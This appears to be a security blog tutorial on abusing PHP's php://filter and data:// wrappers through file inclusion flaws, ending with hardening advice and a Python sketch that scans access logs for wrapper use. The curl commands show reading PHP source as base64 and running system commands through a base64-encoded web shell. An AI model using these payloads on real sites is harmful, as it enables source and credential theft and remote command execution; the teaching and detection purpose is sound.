PHP Wrappers: File Inclusion & Code Execution

Published on March 13, 2025


PHP includes a set of protocol wrappers that allow interaction with different stream resources, such as local and remote filesystems. These wrappers can be leveraged in web applications to bypass security filters or execute malicious code through **File Inclusion vulnerabilities**. This article focuses on two powerful wrappers: php://filter and data://.

Using php://filter for File Inclusion

The php://filter wrapper enables file inclusion while applying stream filters, such as **base64 encoding**. This allows an attacker to read PHP source files without executing them, which can reveal sensitive information.

For example, using php://filter/resource=admin.php as a Local File Inclusion (LFI) payload:

curl "http://target-site.com/index.php?page=php://filter/resource=admin.php"

Without an encoding filter, the included file is still parsed by PHP: the response shows its rendered HTML, but the PHP code itself is executed server-side and never appears. To retrieve the raw PHP source instead, we can have the filter base64-encode the file's contents:

curl "http://target-site.com/index.php?page=php://filter/convert.base64-encode/resource=admin.php"

The response will contain base64-encoded data, which we can decode using:

echo "BASE64_ENCODED_DATA" | base64 -d

This technique can expose database credentials, API keys, or even server configurations.

Executing Code with data://

The data:// wrapper allows embedding raw data into an application as a resource. When combined with LFI vulnerabilities, it can be used to execute arbitrary PHP code.

For example, injecting a command execution payload:

curl "http://target-site.com/index.php?page=data://text/plain,<?php system('ls'); ?>"

If successful, this will execute the ls command, listing directory contents.

When security mechanisms block direct PHP execution, encoding the payload in base64 can help:

echo -n '<?php system($_GET["cmd"]);?>' | base64

Then, include it in the request:

curl "http://target-site.com/index.php?page=data://text/plain;base64,BASE64_ENCODED_PAYLOAD&cmd=id"

This method enables remote command execution, but it requires allow_url_include to be enabled in the PHP configuration.

Mitigations & Hardening

  • Disable allow_url_include and allow_url_fopen in php.ini.
  • Use strict input validation and whitelisting for file inclusion parameters.
  • Ensure files outside the web root are not accessible via inclusion.
  • Monitor web server logs for suspicious usage of PHP wrappers.
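
The log-monitoring item above, as an added example (not code from the original article): a Python sketch that parses combined-format access log lines, percent-decodes each query parameter and flags values that start with php:// or data:. The sample log lines, client addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Client address and request line of a combined-format access log entry.
REQUEST_RE = re.compile(
    r'^(?P<client>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"'
)
# Wrapper prefixes covered by this article; "data:" also matches "data://".
WRAPPER_RE = re.compile(r"^\s*(php://|data:)", re.IGNORECASE)

def find_wrapper_params(log_line):
    """Return one dict per query parameter whose decoded value starts with a wrapper."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    query = m.group("target").partition("?")[2]
    hits = []
    # parse_qsl percent-decodes names and values, so encoded prefixes are caught too.
    for name, value in parse_qsl(query, keep_blank_values=True):
        w = WRAPPER_RE.match(value)
        if w:
            hits.append({"client": m.group("client"), "param": name,
                         "wrapper": w.group(1).lower(), "value": value})
    return hits

def scan(lines):
    """Flatten the hits from every log line into one list."""
    return [hit for line in lines for hit in find_wrapper_params(line)]

# Constructed sample entries (documentation IP ranges, placeholder payload from the article).
SAMPLE_LOG = [
    '192.0.2.10 - - [13/Mar/2025:10:00:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 512',
    '198.51.100.7 - - [13/Mar/2025:10:00:05 +0000] "GET /index.php?page=php://filter/convert.base64-encode/resource=admin.php HTTP/1.1" 200 2048',
    '198.51.100.7 - - [13/Mar/2025:10:00:09 +0000] "GET /index.php?page=PHP%3A%2F%2Ffilter%2Fresource%3Dadmin.php HTTP/1.1" 200 734',
    '198.51.100.7 - - [13/Mar/2025:10:00:12 +0000] "GET /index.php?page=data://text/plain;base64,BASE64_ENCODED_PAYLOAD&cmd=id HTTP/1.1" 200 90',
    '192.0.2.10 - - [13/Mar/2025:10:00:20 +0000] "GET /search.php?ref=https://example.com/data HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f'{hit["client"]} param={hit["param"]} wrapper={hit["wrapper"]} value={hit["value"]}')
```

Access logs record only the request line, so this check covers query-string parameters; values sent in POST bodies or cookies need the same check at the application layer.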

Understanding and mitigating these risks is crucial for securing PHP-based web applications.